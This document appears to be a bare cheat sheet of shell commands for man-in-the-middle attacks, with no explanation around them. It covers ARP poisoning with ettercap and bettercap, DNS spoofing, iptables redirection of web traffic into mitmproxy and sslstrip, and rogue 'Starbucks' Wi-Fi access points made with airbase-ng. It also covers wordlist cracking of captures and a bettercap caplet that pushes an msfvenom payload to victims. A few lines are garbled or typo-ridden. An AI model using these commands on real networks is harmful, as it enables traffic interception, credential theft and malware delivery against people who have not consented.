======
sysctl -w net.inet.ip.forwarding=1
iptables -t nat -A POSTROUTING -i eth0 -j MASQUERADE
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
mitmproxy -T --host -e
-T
ettercap -T -q -M METHOD:ARGS ba:ad:f0:0d:aa:aa/10.1.1.1// /10.1.1.2-6//
ettercap -TqM arp:remote /10.0.0.1// /10.0.0.42//
etterfilter -o smb.ef smb.filter
ettercap -TqM arp:remote -F smb.ef /10.0.0.1// /10.0.0.42//
s(13)
sudo bettercap --eval "caplets.update; ui.uipdate;q"
sudo bettercap --caplet http[s]-ui
help net.recon
net.recon {on,off}
net.recon on; sleep 30; net.recon off
net.probe {on,off}
net.sniff {on,off,status}
set net.sniff.output file.txt
net.fuzz {on,off}
set net.fuzz.layers layers
ticker {on,off}; set ticker.commands list <semicolon> of <semicolon> commands <semicolon>; set ticker.period 60;
net.show
clear
cat foo.cap <<EOF
set ticker.commands 'clear; net.show; events.show 10'
net.probe ON
ticker ON
EOF
bettercap --caplet /path/to/foo.cap
bettercap --caplet foo (.:./caplets/:$CAPSPATH:/usr/local/share/bettercap/caplets/)
caplets.show
caplets.update
(generate msfvenom payload placed into caplets directory /usr/local/share/bettercap/caplets/download-autopwn/windows/payload.exe); bettercap -caplet /usr/local/share/bettercap/caplets/download-autopwn.cap -eval 'events.ignore endpoint; set arp.spoof.targets <ip>; arp.spoof.on'
events.ignore endpoint
update.check on
get http.*
active
q
help MODULE_NAME
include CAPLET
alias MAC NAME
net.probe on
set arp.spoof.targets <ip-addrs>
arp.spoof on
set net.sniff.verbose true
net.sniff on
net.sniff module
dns.spoof {on,off}; set dns.spoof.address 10.1.1.0; set dns.spoof.domains domain; set dns.spoof.all {true,false}; set dns.spoof.hosts hostsfile;
aircrack-ng traffic.pcap -r /path/to/wordlist.txt
airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon0
airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon1
airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon2
airbase-ng -a aa:aa:aa:aa:aa:aa -c 1 -Z 4 mon0 --essid NoAP
<a href="https://certbot.eff.org/lets-encrypt/ubuntubionic-apache">https://certbot.eff.org/lets-encrypt/ubuntubionic-apache</a>
mitmdump --mode transparent -s sslstrip.py
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080